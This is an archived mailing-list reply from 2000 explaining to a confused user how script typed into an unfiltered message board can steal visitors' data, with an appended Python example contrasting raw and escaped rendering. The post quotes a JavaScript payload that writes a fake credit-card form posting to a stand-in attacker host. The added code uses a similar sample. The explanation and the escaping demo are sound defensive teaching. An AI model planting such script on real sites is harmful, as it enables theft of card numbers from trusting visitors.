Re: [mv] RE: ..about time
****** message to minivend-users from "kyle@invisio.com" <kyle@invisio.com> ******
It is not really about doing something malicious to a visitor's
computer (like a virus), it is more like this:
a web site takes form info from a visitor and displays it on a web
page for others to see (like a message board) and someone enters
the code below in the text box:
<script language="JavaScript">
<!--
document.write('<form action="https://evil.site.com/cgi/ripoff.pl" method="post">');
document.write('To purchase, please enter your credit card number below.<br>');
document.write('<input type="TEXT" name="cc" value="">');
document.write('<input type="SUBMIT" name="SUBMIT" value="SUBMIT">');
document.write('</form>');
// -->
</script>
Obviously they could dress it up and make it look like an official form on
that site if that site did not filter for such content.
Then someone stumbles on this form on a site they trust and what do you know,
but evil.site.com now has their cc number.
This is just one example, just think of the possibilities!
Kyle (KC)
At 02:07 PM 2/3/00 -0600, you wrote:
>****** message to minivend-users from "Nick Pleis" <npleis@cei.net> ******
>
>I'm a bit confused...How malicious can you really be with Javascript?
>
>I mean...sure you can change the appearance and what not, but can you do
>any serious <<damage>> or is this more of a threat to just presentation?
>
>
>>
>> I am certainly not advocating closing down the web; that would make me
>> have to go back and work for a living. 8-)
>>
>> --
>> Mike Heins http://www.minivend.com/ ___
>> Internet Robotics |_ _|____
>> In character, in manners, in 131 Willow Lane, Floor 2 | || _ \
>> style, in all things, the Oxford, OH 45056 | || |_) |
>> supreme excellence is <mikeh@minivend.com> |___| _ <
>> simplicity. -- Longfellow 513.523.7621 FAX 7501 |_| \_\
-
To unsubscribe from the list, DO NOT REPLY to this message. Instead, send
email with 'UNSUBSCRIBE minivend-users' in the body to Majordomo@minivend.com.
Archive of past messages: http://www.minivend.com/minivend/minivend-list
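
The unfiltered display described in the message above, next to an output-escaped version, as an added example that is not part of the original post. The function names, the constructed sample submission and the placeholder host collector.example are assumptions made for illustration.

```python
import html
from html.parser import HTMLParser

# Constructed sample of a message-board submission, modelled on the post above.
# "collector.example" is a placeholder host, not one taken from the thread.
SUBMISSION = """<script language="JavaScript">
document.write('<form action="https://collector.example/cgi" method="post">');
document.write('<input type="TEXT" name="cc" value="">');
document.write('</form>');
</script>"""

# Elements a browser acts on rather than merely displays.
ACTIVE_TAGS = {"script", "form", "input", "iframe", "object", "embed"}


class ActiveTagFinder(HTMLParser):
    """Records every active element that a parser sees as real markup."""

    def __init__(self):
        super().__init__()
        self.found = []

    def handle_starttag(self, tag, attrs):
        if tag in ACTIVE_TAGS:
            self.found.append(tag)


def active_tags(markup):
    finder = ActiveTagFinder()
    finder.feed(markup)
    finder.close()
    return finder.found


def render_unfiltered(author, body):
    # What the message describes: visitor input copied into the page as-is.
    return '<div class="msg"><b>%s</b>: %s</div>' % (author, body)


def render_escaped(author, body):
    # Encode & < > " ' so the browser shows the text instead of parsing it.
    return '<div class="msg"><b>%s</b>: %s</div>' % (
        html.escape(author, quote=True), html.escape(body, quote=True))


if __name__ == "__main__":
    for render in (render_unfiltered, render_escaped):
        page = render("visitor", SUBMISSION)
        print(render.__name__, "-> active tags:", active_tags(page))
```

The form tags inside the script are not counted in the unfiltered page because they only exist once the browser runs the script; the live `script` element is what makes them possible.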